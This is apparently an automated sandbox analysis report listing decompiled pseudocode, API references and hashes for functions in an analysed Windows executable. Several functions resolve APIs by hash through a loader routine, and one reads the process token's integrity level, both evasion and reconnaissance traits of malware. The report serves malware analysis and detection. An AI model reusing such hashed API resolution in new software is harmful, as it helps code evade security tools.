String ID:
API String ID: 3239854522-0
Opcode ID: 26397411c56018a4321283e38adce1dc21d5a115f8c0881a86b6e8492ab596c7
Instruction ID: a57a89866103df5ca861ea05c2c9277b00f856896d7adf791b7ce0eb08539d2e
Opcode Fuzzy Hash: 26397411c56018a4321283e38adce1dc21d5a115f8c0881a86b6e8492ab596c7
Instruction Fuzzy Hash: 96E0DF3254020077D22023A28C4EFAB7A298B86BA0F14002EFB08266D29EB9240182AD

Uniqueness

Uniqueness Score: 23.02%

Function 0041A358, Relevance: 3.0, APIs: 2, Instructions: 23
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E0041A358() {
				void* _t1;
				void* _t5;
				void* _t6;
				void* _t7;

				_t5 = 0x44db70;
				_t6 = 0;
				while(1) {
					_t1 = E0041A0CF(0, _t5, 0xfa0, 0); // executed
					_t7 = _t7 + 0xc;
					if(_t1 == 0) {
						break;
					}
					 *0x44db88 =  *0x44db88 + 1;
					_t6 = _t6 + 0x18;
					_t5 = _t5 + 0x18;
					if(_t6 < 0x18) {
						continue;
					}
					return 1;
				}
				E0041A394();
				__eflags = 0;
				return 0;
			}

0x0041a35a
0x0041a35f
0x0041a361
0x0041a369
0x0041a36e
0x0041a373
0x00000000
0x00000000
0x0041a375
0x0041a37b
0x0041a37e
0x0041a384
0x00000000
0x00000000
0x00000000
0x0041a386
0x0041a38a
0x0041a38f
0x00000000

APIs

___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0041A369

Part of subcall function 0041A0CF: try_get_function.LIBVCRUNTIME ref: 0041A0E4
Part of subcall function 0041A0CF: InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,?), ref: 0041A10C

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0041A38A

Part of subcall function 0041A394: DeleteCriticalSection.KERNEL32(0044DB58,0044DB70,00000000,0041A38F), ref: 0041A3AA

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: CriticalSection$Initialize$CountDeleteSpin___vcrt____vcrt_uninitialize_lockstry_get_function
String ID:
API String ID: 2434900554-0
Opcode ID: 3121b4c64f4c3af16956db28c32c3b04346f8df7cb2bcc77b91a2a4fe36fddbb
Instruction ID: 32762422d10a7fc6b50b809b62ac17ea09c44abdd6e8e6367dd93ec2805c7d94
Opcode Fuzzy Hash: 3121b4c64f4c3af16956db28c32c3b04346f8df7cb2bcc77b91a2a4fe36fddbb
Instruction Fuzzy Hash: ABD02EB7E0232412D960225B3C0ABEB07149F83B20F1B00ABFC2867283D41848E390EF

Uniqueness

Uniqueness Score: 100.00%

Function 0041A296, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041A296(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E00419FE4(__eflags, E0041A1DA); // executed
				 *0x44b6e0 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E0041A092(__eflags, _t1, 0x44db48);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E0041A2C9(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x0041a29b
0x0041a2a0
0x0041a2a9
0x0041a2b4
0x0041a2ba
0x0041a2bb
0x0041a2bd
0x0041a2c8
0x0041a2bf
0x0041a2bf
0x00000000
0x0041a2bf
0x0041a2ab
0x0041a2ab
0x0041a2ad
0x0041a2ad

APIs

Part of subcall function 00419FE4: try_get_function.LIBVCRUNTIME ref: 00419FF9

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0041A2B4

Part of subcall function 0041A092: try_get_function.LIBVCRUNTIME ref: 0041A0A7
Part of subcall function 0041A092: TlsSetValue.KERNEL32(00000000,?), ref: 0041A0C6

___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0041A2BF

Part of subcall function 0041A2C9: ___vcrt_FlsFree.LIBVCRUNTIME ref: 0041A2D4

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Value___vcrt_try_get_function$Free___vcrt_uninitialize_ptd
String ID:
API String ID: 957299666-0
Opcode ID: 634a59b6edc2ed22d2861d8a1464844f906fb7c9f3d5c62b29d54f2e76de27ab
Instruction ID: 0c311e544c9bb89dccf52c883cc5ddf376226db9064712fc86cc714833ff69c0
Opcode Fuzzy Hash: 634a59b6edc2ed22d2861d8a1464844f906fb7c9f3d5c62b29d54f2e76de27ab
Instruction Fuzzy Hash: F1D0A739656701149D10A67528139C93340645277477142CFE110C5BC1EB3E84E2A11F

Uniqueness

Uniqueness Score: 0.83%

Function 004095B4, Relevance: 2.6, APIs: 2, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004095B4(intOrPtr* __ecx) {
				void* __ebx;
				int _t20;
				intOrPtr* _t21;
				intOrPtr* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;
				intOrPtr* _t28;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr* _t54;
				intOrPtr _t64;

				_t54 = __ecx;
				if( *__ecx != 0) {
					_t64 =  *((intOrPtr*)(__ecx + 8));
					_t31 = E004010BB(0, 1, 0x3a35705f);
					_t20 =  *_t31(_t64, 0, 0x8000);
				}
				if( *((intOrPtr*)(_t54 + 0xc)) != 0) {
					_t30 = E004010BB(0, 1, 0x3a35705f);
					_t20 =  *_t30( *((intOrPtr*)(_t54 + 0x14)), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t54 + 0x18)) != 0) {
					E004010BB(0, 1, 0x3a35705f);
					_t20 = VirtualFree( *(_t54 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t54 + 0x30)) != 0) {
					_t28 = E004010BB(0, 1, 0x3a35705f);
					_t20 =  *_t28( *((intOrPtr*)(_t54 + 0x38)), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t54 + 0x3c)) != 0) {
					_t27 = E004010BB(0, 1, 0x3a35705f);
					_t20 =  *_t27( *((intOrPtr*)(_t54 + 0x44)), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t54 + 0x48)) != 0) {
					_t26 = E004010BB(0, 1, 0x3a35705f);
					_t20 =  *_t26( *((intOrPtr*)(_t54 + 0x50)), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t54 + 0x54)) != 0) {
					_t25 = E004010BB(0, 1, 0x3a35705f);
					_t20 =  *_t25( *((intOrPtr*)(_t54 + 0x5c)), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t54 + 0x24)) != 0) {
					_t24 = E004010BB(0, 1, 0x3a35705f);
					_t20 =  *_t24( *((intOrPtr*)(_t54 + 0x2c)), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t54 + 0x60)) != 0) {
					E004010BB(0, 1, 0x3a35705f);
					_t20 = VirtualFree( *(_t54 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t54 + 0x80)) != 0) {
					_t21 = E004010BB(0, 1, 0x3a35705f);
					return  *_t21( *((intOrPtr*)(_t54 + 0x84)), 0, 0x8000);
				}
				return _t20;
			}

0x004095b7
0x004095bd
0x004095bf
0x004095c9
0x004095d7
0x004095d7
0x004095dc
0x004095e8
0x004095f6
0x004095f6
0x004095fb
0x00409607
0x00409615
0x00409615
0x0040961a
0x00409626
0x00409634
0x00409634
0x00409639
0x00409645
0x00409653
0x00409653
0x00409658
0x00409664
0x00409672
0x00409672
0x00409677
0x00409683
0x00409691
0x00409691
0x00409696
0x004096a2
0x004096b0
0x004096b0
0x004096b5
0x004096c1
0x004096cf
0x004096cf
0x004096d7
0x004096e6
0x00000000
0x004096f4
0x004096f9

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,7757BFA8,00404BBB), ref: 00409615
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,7757BFA8,00404BBB), ref: 004096CF

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: FreeVirtual$LibraryLoad
String ID:
API String ID: 796782718-0
Opcode ID: 94ce7bd60ce5338c563c17d1624391124b92d149c4f89580603b09ee7fd82e6a
Instruction ID: 60933499c851c7816709b3d3930cf21efea0d56201905f6793b12a97df2b2480
Opcode Fuzzy Hash: 94ce7bd60ce5338c563c17d1624391124b92d149c4f89580603b09ee7fd82e6a
Instruction Fuzzy Hash: 2F31B273104A517FE2242AA19C86F96B398FB05764F14082FF3403B5C29FB93C918BD9

Uniqueness

Uniqueness Score: 0.03%

Function 00407499, Relevance: 2.5, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407499(void** __ecx) {
				void** _t5;

				_t5 = __ecx;
				if( *__ecx != 0) {
					VirtualFree( *__ecx, 0, 0x8000); // executed
				}
				return CloseHandle( *(_t5 + 4));
			}

0x0040749a
0x0040749f
0x004074aa
0x004074aa
0x004074ba

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,0000005E,00403AD3), ref: 004074AA
CloseHandle.KERNEL32(?), ref: 004074B3

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: CloseFreeHandleVirtual
String ID:
API String ID: 2443081362-0
Opcode ID: 11299f77dca26c82116333460a077def67cce35646fe4c2f58e39645911d33eb
Instruction ID: 926c43c135f26a652e7c66776bb0a244ac3cfcee675331ba90939ba6d1ad2692
Opcode Fuzzy Hash: 11299f77dca26c82116333460a077def67cce35646fe4c2f58e39645911d33eb
Instruction Fuzzy Hash: B0D01231500510DBD7311F14EC09BC57EA0BB08741F14C439B281604F4C7B52C80CB58

Uniqueness

Uniqueness Score: 0.65%

Function 0042CECB, Relevance: 1.6, APIs: 1, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042CECB(intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				signed int _t58;
				char _t61;
				char _t66;
				signed char _t67;
				signed int _t68;
				signed int _t78;
				char _t83;
				signed int _t86;
				signed char _t87;
				char _t88;
				void* _t89;
				signed int _t90;
				intOrPtr _t96;
				signed int _t98;

				_t58 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t58 ^ _t98;
				_t96 = _a4;
				if( *(_t96 + 4) == 0xfde9) {
					L19:
					__eflags = 0;
					_t83 = 0;
					do {
						_t46 = _t83 - 0x61; // -97
						_t89 = _t46;
						_t47 = _t89 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t89 - 0x19;
							if(_t89 > 0x19) {
								_t61 = 0;
							} else {
								_t53 = _t96 + 0x19; // 0x42d309
								 *(_t53 + _t83) =  *(_t53 + _t83) | 0x00000020;
								_t54 = _t83 - 0x20; // -32
								_t61 = _t54;
							}
						} else {
							 *(_t96 + _t83 + 0x19) =  *(_t96 + _t83 + 0x19) | 0x00000010;
							_t52 = _t83 + 0x20; // 0x20
							_t61 = _t52;
						}
						 *((char*)(_t96 + _t83 + 0x119)) = _t61;
						_t83 = _t83 + 1;
						__eflags = _t83 - 0x100;
					} while (_t83 < 0x100);
					L26:
					E00415A87();
					return _t61;
				}
				_t5 = _t96 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t66 = 0;
					do {
						 *((char*)(_t98 + _t66 - 0x104)) = _t66;
						_t66 = _t66 + 1;
					} while (_t66 < 0x100);
					_t67 = _v1814;
					_t86 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t106 = _t67;
						if(_t67 == 0) {
							break;
						}
						_t90 =  *(_t86 + 1) & 0x000000ff;
						_t68 = _t67 & 0x000000ff;
						while(1) {
							__eflags = _t68 - _t90;
							if(_t68 > _t90) {
								break;
							}
							__eflags = _t68 - 0x100;
							if(_t68 >= 0x100) {
								break;
							}
							 *((char*)(_t98 + _t68 - 0x104)) = 0x20;
							_t68 = _t68 + 1;
							__eflags = _t68;
						}
						_t86 = _t86 + 2;
						__eflags = _t86;
						_t67 =  *_t86;
					}
					_t14 = _t96 + 4; // 0xe8458d00
					E0042A148(_t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t14, 0);
					_t17 = _t96 + 4; // 0xe8458d00
					_t20 = _t96 + 0x21c; // 0x8b02eb59
					E0042A439(_t106, 0,  *_t20, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t17, 0); // executed
					_t22 = _t96 + 4; // 0xe8458d00
					_t24 = _t96 + 0x21c; // 0x8b02eb59
					E0042A439(_t106, 0,  *_t24, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t22, 0);
					_t78 = 0;
					do {
						_t87 =  *(_t98 + _t78 * 2 - 0x704) & 0x0000ffff;
						if((_t87 & 0x00000001) == 0) {
							__eflags = _t87 & 0x00000002;
							if((_t87 & 0x00000002) == 0) {
								_t88 = 0;
							} else {
								 *(_t96 + _t78 + 0x19) =  *(_t96 + _t78 + 0x19) | 0x00000020;
								_t88 =  *((intOrPtr*)(_t98 + _t78 - 0x304));
							}
						} else {
							 *(_t96 + _t78 + 0x19) =  *(_t96 + _t78 + 0x19) | 0x00000010;
							_t88 =  *((intOrPtr*)(_t98 + _t78 - 0x204));
						}
						 *((char*)(_t96 + _t78 + 0x119)) = _t88;
						_t78 = _t78 + 1;
					} while (_t78 < 0x100);
					goto L26;
				}
			}

0x0042ced6
0x0042cedd
0x0042cee2
0x0042ceed
0x0042cfff
0x0042cfff
0x0042d006
0x0042d008
0x0042d008
0x0042d008
0x0042d00b
0x0042d00e
0x0042d011
0x0042d01d
0x0042d020
0x0042d02f
0x0042d022
0x0042d022
0x0042d027
0x0042d02a
0x0042d02a
0x0042d02a
0x0042d013
0x0042d013
0x0042d018
0x0042d018
0x0042d018
0x0042d031
0x0042d038
0x0042d039
0x0042d039
0x0042d03d
0x0042d045
0x0042d04d
0x0042d04d
0x0042cefa
0x0042cf05
0x00000000
0x0042cf0b
0x0042cf12
0x0042cf14
0x0042cf14
0x0042cf1b
0x0042cf1c
0x0042cf20
0x0042cf26
0x0042cf2c
0x0042cf54
0x0042cf54
0x0042cf56
0x00000000
0x00000000
0x0042cf35
0x0042cf39
0x0042cf4b
0x0042cf4b
0x0042cf4d
0x00000000
0x00000000
0x0042cf3e
0x0042cf40
0x00000000
0x00000000
0x0042cf42
0x0042cf4a
0x0042cf4a
0x0042cf4a
0x0042cf4f
0x0042cf4f
0x0042cf52
0x0042cf52
0x0042cf59
0x0042cf6e
0x0042cf74
0x0042cf88
0x0042cf8f
0x0042cf9e
0x0042cfb0
0x0042cfb7
0x0042cfbf
0x0042cfc1
0x0042cfc1
0x0042cfcc
0x0042cfdc
0x0042cfdf
0x0042cfef
0x0042cfe1
0x0042cfe1
0x0042cfe6
0x0042cfe6
0x0042cfce
0x0042cfce
0x0042cfd3
0x0042cfd3
0x0042cff1
0x0042cff8
0x0042cff9
0x00000000
0x0042cffd

APIs

GetCPInfo.KERNEL32(E8458D00,?,00426967,0042695B,00000000), ref: 0042CEFD

Part of subcall function 0042A148: GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 0042A218
Part of subcall function 0042A148: __freea.LIBCMT ref: 0042A221

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: FeatureInfoPresentProcessorStringType___raise_securityfailure__freea
String ID:
API String ID: 543332554-0
Opcode ID: c56770e8e888ed8954fa6d6b3b852213417ace022215bb8f9bf8df4c2580501d
Instruction ID: cee76f4dc28bf504ae3df7e4a64593a48ed4a5895fdaa8d4d8ae2e41231a7881
Opcode Fuzzy Hash: c56770e8e888ed8954fa6d6b3b852213417ace022215bb8f9bf8df4c2580501d
Instruction Fuzzy Hash: 4641AD707042685BDB218B18DDC4BFFBBEEDB05308FA404AEE58A87182D2799D45DB25

Uniqueness

Uniqueness Score: 1.11%

Function 004079F0, Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004079F0(intOrPtr* __ecx, intOrPtr __edx) {
				void* __ebx;
				void* __edi;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				void* _t35;
				intOrPtr* _t36;
				signed char _t38;
				intOrPtr _t39;
				char* _t45;
				intOrPtr _t51;
				intOrPtr* _t56;
				intOrPtr* _t60;
				void* _t61;
				void* _t62;
				void* _t64;

				_t59 = __edx;
				_t60 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x28));
				_t31 = E00406690( *((intOrPtr*)(__ecx + 0x28)), __ecx, __edx, __ecx, _t61);
				if(_t31 != 0) {
					L3:
					_push(_t61);
					_t32 = E00406BB0(_t60 + 0x24, _t59, _t66, _t42);
					_t62 = _t32;
					if( *((intOrPtr*)(_t60 + 0x4c)) != 0x7c) {
						L23:
						return _t32;
					} else {
						goto L4;
					}
					do {
						L4:
						_t45 =  *_t60;
						_t33 =  *((intOrPtr*)(_t60 + 8));
						if(_t45 == _t33) {
							goto L15;
						}
						if( *_t45 != 0x5c) {
							L14:
							 *_t60 =  *_t60 + 1;
							goto L15;
						}
						_t56 = _t45 + 1;
						if(_t56 == _t33) {
							goto L14;
						}
						_t38 =  *(_t60 + 0x50);
						if((_t38 & 0x00000008) != 0) {
							L10:
							if((_t38 & 0x00000010) != 0) {
								goto L14;
							}
							_t39 =  *_t56;
							if(_t39 == 0x7b || _t39 == 0x7d) {
								L13:
								 *_t60 = _t56;
							}
							goto L14;
						}
						_t59 =  *_t56;
						if(_t59 == 0x28 || _t59 == 0x29) {
							goto L13;
						} else {
							goto L10;
						}
						L15:
						E0040C280(_t60);
						_t35 = E00406690(_t42, _t60, _t59, _t60, _t62);
						_t78 = _t35;
						if(_t35 == 0) {
							_t36 = E0041500C(_t59, _t78, 0x14);
							_t64 = _t64 + 4;
							if(_t36 == 0) {
								_t36 = 0;
								__eflags = 0;
							} else {
								 *_t36 = 0x437520;
								 *((intOrPtr*)(_t36 + 4)) = 8;
								 *((intOrPtr*)(_t36 + 8)) = 0;
								 *((intOrPtr*)(_t36 + 0xc)) = 0;
								 *((intOrPtr*)(_t36 + 0x10)) = 0;
							}
							 *((intOrPtr*)(_t36 + 0x10)) =  *((intOrPtr*)(_t60 + 0x28));
							_t51 =  *((intOrPtr*)( *((intOrPtr*)(_t60 + 0x28)) + 0xc));
							if(_t51 != 0) {
								 *((intOrPtr*)(_t36 + 0xc)) = _t51;
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t60 + 0x28)) + 0xc)) + 0x10)) = _t36;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t60 + 0x28)) + 0xc)) = _t36;
							 *((intOrPtr*)(_t60 + 0x28)) = _t36;
							E004091C0(_t60 + 0x24, _t36);
						}
						_t32 = E00409100(_t60 + 0x24, _t42, _t62); // executed
					} while ( *((intOrPtr*)(_t60 + 0x4c)) == 0x7c);
					goto L23;
				}
				_t66 =  *((intOrPtr*)(__ecx + 0x4c)) - 0x7c;
				if( *((intOrPtr*)(__ecx + 0x4c)) == 0x7c) {
					E004091C0(__ecx + 0x24, E0040B470(__ecx + 0x24, __edx, _t66, 8));
					goto L3;
				}
				return _t31;
			}

0x004079f0
0x004079f3
0x004079f5
0x004079f8
0x004079ff
0x00407a1e
0x00407a1e
0x00407a23
0x00407a2c
0x00407a2e
0x00407af4
0x00000000
0x00000000
0x00000000
0x00000000
0x00407a34
0x00407a34
0x00407a34
0x00407a36
0x00407a3b
0x00000000
0x00000000
0x00407a40
0x00407a6a
0x00407a6a
0x00000000
0x00407a6a
0x00407a42
0x00407a45
0x00000000
0x00000000
0x00407a47
0x00407a4c
0x00407a5a
0x00407a5c
0x00000000
0x00000000
0x00407a5e
0x00407a62
0x00407a68
0x00407a68
0x00407a68
0x00000000
0x00407a62
0x00407a4e
0x00407a53
0x00000000
0x00000000
0x00000000
0x00000000
0x00407a6c
0x00407a6e
0x00407a75
0x00407a7a
0x00407a7c
0x00407a80
0x00407a85
0x00407a8a
0x00407ab0
0x00407ab0
0x00407a8c
0x00407a8c
0x00407a92
0x00407a99
0x00407aa0
0x00407aa7
0x00407aa7
0x00407ab5
0x00407abb
0x00407ac0
0x00407ac2
0x00407acb
0x00407acb
0x00407ad2
0x00407ad8
0x00407adb
0x00407adb
0x00407ae5
0x00407aea
0x00000000
0x00407a34
0x00407a01
0x00407a05
0x00407a19
0x00000000
0x00407a19
0x00407af8

APIs

Part of subcall function 00406BB0: new.LIBCMT ref: 00406BB6
Part of subcall function 00406BB0: new.LIBCMT ref: 00406C11

Part of subcall function 0040C280: ___from_strstr_to_strchr.LIBCMT ref: 0040C2A5

new.LIBCMT ref: 00407A80

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

Part of subcall function 004091C0: new.LIBCMT ref: 004091F1

Part of subcall function 00409100: new.LIBCMT ref: 0040913D

Part of subcall function 0040B470: new.LIBCMT ref: 0040B475

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task___from_strstr_to_strchr
String ID:
API String ID: 3695167016-0
Opcode ID: 57d350256daf039d257604df8113d7617f9d1faa1bcc805a55a4784e528dda13
Instruction ID: b20cbf5c91deefd149565436f35a4f593516297427a4116fc52163726e5b03ac
Opcode Fuzzy Hash: 57d350256daf039d257604df8113d7617f9d1faa1bcc805a55a4784e528dda13
Instruction Fuzzy Hash: BB31C2707042029FDB18CF26C490A6AB7A4BF48354F14807FD4056BBD2DB39BA52CF9A

Uniqueness

Uniqueness Score: 1.47%

Function 00405F10, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00405F10(void* __ecx) {
				intOrPtr _t22;
				signed int _t23;
				signed int _t25;
				unsigned int _t30;
				signed short _t35;
				signed short _t39;
				intOrPtr _t40;
				void* _t41;
				void* _t42;

				_t40 =  *((intOrPtr*)(_t42 + 0x10));
				_t41 = __ecx;
				_t39 =  *((intOrPtr*)(_t42 + 0x18));
				_t30 = 0;
				_t35 = 0x107;
				do {
					_t22 =  *((intOrPtr*)(_t41 + 0xc));
					if(_t39 == 0xffff) {
						__eflags = _t30 - 0x5f;
						if(__eflags == 0) {
							L6:
							_t23 = 1;
						} else {
							__eflags =  *( *( *((intOrPtr*)(_t22 + 4)) + 0xc) + (_t30 & 0x000000ff) * 2) & _t35;
							if(__eflags != 0) {
								goto L6;
							} else {
								_t23 = 0;
							}
						}
					} else {
						_t23 =  *( *((intOrPtr*)(_t22 + 4)) + 0xc) & 0xffffff00 | ( *( *( *((intOrPtr*)(_t22 + 4)) + 0xc) + (_t30 & 0x000000ff) * 2) & _t39) != 0x00000000;
					}
					if(_t23 !=  *((intOrPtr*)(_t42 + 0x1c))) {
						_t47 =  *((intOrPtr*)(_t40 + 0x18));
						if( *((intOrPtr*)(_t40 + 0x18)) == 0) {
							_t25 = E0041500C(_t35, _t47, 0x20); // executed
							_t42 = _t42 + 4;
							if(_t25 == 0) {
								_t25 = 0;
								__eflags = 0;
							} else {
								asm("xorps xmm0, xmm0");
								asm("movups [eax], xmm0");
								asm("movups [eax+0x10], xmm0");
							}
							 *((intOrPtr*)(_t40 + 0x18)) = _t25;
						}
						_t23 = _t30 & 0x00000007;
						asm("bts ecx, eax");
						 *((_t30 >> 3) +  *((intOrPtr*)(_t40 + 0x18))) =  *((_t30 >> 3) +  *((intOrPtr*)(_t40 + 0x18))) & 0x000000ff;
						_t35 = 0x107;
					}
					_t30 = _t30 + 1;
				} while (_t30 < 0x100);
				return _t23;
			}

0x00405f13
0x00405f17
0x00405f1a
0x00405f1f
0x00405f21
0x00405f26
0x00405f26
0x00405f2d
0x00405f41
0x00405f44
0x00405f59
0x00405f59
0x00405f46
0x00405f4f
0x00405f53
0x00000000
0x00405f55
0x00405f55
0x00405f55
0x00405f53
0x00405f2f
0x00405f3c
0x00405f3c
0x00405f5f
0x00405f61
0x00405f65
0x00405f69
0x00405f6e
0x00405f73
0x00405f81
0x00405f81
0x00405f75
0x00405f75
0x00405f78
0x00405f7b
0x00405f7b
0x00405f83
0x00405f83
0x00405f8d
0x00405f96
0x00405f99
0x00405f9b
0x00405f9b
0x00405fa0
0x00405fa1
0x00405fb1

APIs

new.LIBCMT ref: 00405F69

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 4dd5d2d5444e9634381a1824f63c31b813c518ac71ce979a4f70654b2ffcdd89
Instruction ID: 6ea61e826948389af82f166667875544cf2c1445a955d414a5cfdba9862f59f4
Opcode Fuzzy Hash: 4dd5d2d5444e9634381a1824f63c31b813c518ac71ce979a4f70654b2ffcdd89
Instruction Fuzzy Hash: A411B271A04B02CFD324CF15C480BA3B7E5EF61310F16857BE889972A2D67CE899CB55

Uniqueness

Uniqueness Score: 1.47%

Function 0040C469, Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040C469(void* __ebx, void* __eflags) {
				void* _v8;
				long _v12;
				void _v88;
				void* _t12;
				intOrPtr* _t13;
				int _t17;
				intOrPtr _t33;
				void _t36;

				_t33 = 0;
				_t12 =  *((intOrPtr*)(E004010BB(__ebx, 1, 0xd89ad05)))();
				_t13 = E004010BB(__ebx, 5, 0x80dbbe07);
				_push( &_v8);
				_push(8);
				_push(_t12);
				if( *_t13() != 0) {
					E004010BB(__ebx, 5, 0xd4ecc759);
					_t17 = GetTokenInformation(_v8, 0x19,  &_v88, 0x4c,  &_v12); // executed
					if(_t17 != 0) {
						_t36 = _v88;
						if(E0040BE8C(_t36) != 0) {
							_t33 =  *((intOrPtr*)(_t36 + 4 + ( *(_t36 + 1) & 0x000000ff) * 4));
						}
					}
					E0040162C(_v8);
				}
				return _t33;
			}

0x0040c478
0x0040c481
0x0040c48c
0x0040c496
0x0040c497
0x0040c499
0x0040c49e
0x0040c4aa
0x0040c4be
0x0040c4c2
0x0040c4c4
0x0040c4d0
0x0040c4d6
0x0040c4d6
0x0040c4d0
0x0040c4dd
0x0040c4e2
0x0040c4ea

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

GetTokenInformation.KERNELBASE(?,00000019,?,0000004C,?), ref: 0040C4BE

Memory Dump Source

